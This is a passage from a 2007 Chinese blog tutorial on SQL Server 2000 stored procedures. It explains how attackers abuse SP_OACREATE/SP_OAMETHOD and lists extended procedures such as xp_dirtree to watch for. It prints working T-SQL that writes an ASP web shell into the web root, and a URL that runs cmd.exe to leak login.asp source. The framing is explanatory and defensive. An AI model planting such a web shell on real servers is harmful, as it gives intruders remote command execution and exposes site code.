SQLSERVER2000一些内置存储过程用法和说明_Sql Server_学习笔记★闵涛★计算机学习电脑编程软硬件技巧


	转至繁体中文版	\| 网站首页 \| 图文教程 \| 资源下载 \| 站长博客 \| 图片素材 \| 武汉seo \| 武汉网站优化 \|

SQLSERVER2000一些内置存储过程用法和说明

作者：闵涛文章来源：闵涛的学习笔记点击数：11349 更新时间：2007/11/14 12:27:07

对象，并利用 SP_OAMETHOD 呼叫 “wscript.shell” 对象的 run 方法，以执行操作系统命令接口工具程序 cmd.exe，将 login.asp 输出到 test.txt 档案中，这时骇客只要在网页上输入 http://.../.../test.txt 就可以看到 login.asp 写作的方式，作为下一步侵入的基本信息。

当然，骇客也可以利用 Scripting.FileSystemObject 对象来建立一个 ASP 网页后门，语法如程序代码列表 4 所示：

DECLARE @fs int,@fi int
EXEC SP_OACREATE ''''Scripting.FileSystemObject'''',@fs OUTPUT
EXEC SP_OAMETHOD @fs,''''CreateTextFile'''',@fs OUTPUT,''''C:\InetPub\WWWRoot\SQLInject\Shell.asp'''',1
EXEC SP_OAMETHOD @fs,''''WriteLine'''',null,''''<% Set objShell=Server.CreateObject("WScript.Shell") : objShell.Run Request("cmd") %>''''

程序代码列表 4：建立 ASP 后门网页。

从此透过 URL 就可以执行任何执行文件，范例如下：

http://localhost/sqlinject/shell.asp?cmd=C:\WINNT\system32\cmd.exe /c type c:\inetpub\wwwroot\sqlinject\login.asp > c:\inetpub\wwwroot\sqlinject\test.txt

其它相关的延伸预存程序

这一类的延伸预存程序，你可能要小心的还有：

延伸预存程序的名称

用途

使用范例

xp_availablemedia

显示系统上可用的磁盘驱动器，如 C:\。

xp_availablemedia

xp_dirtree

xp_dirtree ''''c:\inetpub\wwwroot\''''

<< 上一页 [11] [12] [13] [14] [15] [16] [17] 下一页